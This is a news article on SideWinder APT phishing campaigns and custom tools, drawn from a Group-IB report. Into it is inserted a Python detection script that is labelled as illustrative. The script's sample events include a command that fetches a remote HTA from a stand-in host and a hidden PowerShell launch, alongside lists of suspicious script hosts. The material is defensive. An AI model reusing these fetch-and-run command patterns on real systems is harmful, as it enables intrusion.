SideWinder APT Attacks Regional Targets in New Campaign

Security researchers have discovered dozens of new regional targets and new cyberattack tools associated with the Indian APT group SideWinder.

The suspected state-sponsored group, also known as Rattlesnake, Hardcore Nationalist (HN2) and T-APT4, is profiled in a new Group-IB report, Old Snake, New Skin: Analysis of SideWinder APT Activity from June to November 2021.

Over the past six months, SideWinder threat actors have attempted to attack 61 government, military, law enforcement and other targets in Afghanistan, Bhutan, Myanmar, Nepal and Sri Lanka, the threat intelligence firm discovered.

The firm also linked the group to the 2020 attack against the Maldives government.

SideWinder's threat vector of choice remained spear-phishing emails, which it launched against these targets during this period. According to Group-IB, two of the campaigns featured emails in which the APT group impersonated a cryptocurrency company.

When victims click malicious links in the phishing emails, they download malicious documents, LNK files or malicious payloads. The LNK file downloads an HTA file, which in turn downloads the payload. The payload itself can be a reverse shell, a remote access Trojan (RAT) or an information stealer, the report claims.

Group-IB discovered two new homegrown tools used by SideWinder during the campaign: a RAT called SideWinder.RAT.b and an information stealer called SideWinder.StealerPy.

The latter is designed to collect Google Chrome browsing history, credentials saved in the browser, lists of folders in directories, and the metadata and contents of files such as .docx, .pdf and .txt.

According to Group-IB, both custom tools use Telegram, rather than traditional command-and-control (C&C) servers, to communicate with compromised target machines.
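As an added, constructed illustration (not code from Group-IB's report or from SideWinder's tooling) of how a defender might look for the chain described above, the following Python checks simplified, invented process and network events for three signals: a remote HTA launched through mshta.exe from the desktop shell (the footprint of a double-clicked LNK), a script host spawned by mshta.exe, and Telegram API traffic from a process that is not a browser or Telegram client. The event format, host names and process lists are assumptions.

```python
"""Toy detection pass for the LNK -> HTA -> payload chain with Telegram C&C.
All event records below are constructed for illustration, not real telemetry."""

TELEGRAM_API = "api.telegram.org"
# Processes for which Telegram API traffic is expected (assumed allow-list).
EXPECTED_TELEGRAM_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}
# Script hosts an HTA commonly hands off to for the next stage (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
USER_SHELLS = {"explorer.exe"}

# Constructed sample events in a simplified Sysmon-like shape (assumption).
EVENTS = [
    {"type": "process", "host": "ws01", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
    {"type": "process", "host": "ws01", "parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c <constructed>"},
    {"type": "network", "host": "ws01", "image": "python.exe",
     "dest": "api.telegram.org", "port": 443},
    {"type": "network", "host": "ws02", "image": "chrome.exe",
     "dest": "api.telegram.org", "port": 443},
    {"type": "process", "host": "ws02", "parent": "explorer.exe", "image": "winword.exe",
     "cmdline": "winword.exe report.docx"},
]


def detect(events):
    """Return (host, rule, image) findings in event order."""
    findings = []
    for e in events:
        img = e.get("image", "").lower()
        if e["type"] == "process":
            parent = e.get("parent", "").lower()
            cmd = e.get("cmdline", "").lower()
            # Rule 1: mshta.exe started from the desktop shell with a URL argument,
            # i.e. a remote HTA fetched after a user opened an LNK.
            if img == "mshta.exe" and parent in USER_SHELLS and "http" in cmd:
                findings.append((e["host"], "remote_hta_launch", img))
            # Rule 2: the HTA spawning a script host to fetch or run the payload.
            elif parent == "mshta.exe" and img in SCRIPT_HOSTS:
                findings.append((e["host"], "hta_spawns_script_host", img))
        elif e["type"] == "network":
            # Rule 3: Telegram API contact from an unexpected process matches the
            # report's description of Telegram standing in for a C&C server.
            if e.get("dest", "").lower() == TELEGRAM_API and img not in EXPECTED_TELEGRAM_CLIENTS:
                findings.append((e["host"], "telegram_api_unexpected_process", img))
    return findings


if __name__ == "__main__":
    for host, rule, image in detect(EVENTS):
        print(f"{host}: {rule} ({image})")
```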

After analyzing the network infrastructure used by SideWinder, the vendor concluded it is probably the same entity as the BabyElephant APT group.

Group-IB Senior Malware Analyst Dmitry Kupin said:

“As such, we found that several indications of compromise related to another APT group, Donot, were erroneously attributed to SideWinder. Nevertheless, we found additional evidence confirming that Patchwork (Hangover), Donot, and SideWinder sometimes borrow tools and malicious documents from each other and tailor them to their needs.”

Group-IB was unable to determine how many SideWinder phishing attempts were successful.
